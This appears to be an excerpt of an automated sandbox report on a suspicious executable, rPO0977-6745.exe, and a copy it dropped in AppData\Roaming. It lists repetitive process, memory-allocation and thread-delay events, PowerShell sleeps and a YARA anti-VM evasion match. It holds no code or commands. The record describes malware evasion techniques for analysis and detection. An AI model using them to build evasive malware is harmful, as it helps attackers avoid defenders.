Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 2F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 3190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 7B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 8B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 8E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 9E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 1440000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: D40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 49F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 7580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 8580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 7580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 2790000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Memory allocated: 4790000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599654	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598983	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598758	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598542	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598436	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 598091	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597983	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597653	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595640	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599344
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599220
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 599094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598982
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598766
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597765
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597216
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597109
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 597000
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596890
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596660
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596516
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596357
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596241
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596140
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 596029
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595921
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595812
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595703
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595594
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595484
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595375
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595265
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595156
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 595046
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594714
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594607
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Thread delayed: delay time: 594500

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7745	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 938	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8062	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 869	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Window / User API: threadDelayed 2969	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe	Window / User API: threadDelayed 6883	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Window / User API: threadDelayed 3230
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe	Window / User API: threadDelayed 6619

Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 6440	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599872s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420	Thread sleep count: 2969 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599654s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420	Thread sleep count: 6883 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599202s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -599093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598983s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598758s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598542s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598436s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -598091s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597983s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388	Thread sleep time: -596781s >= -30000s	Jump to behavior
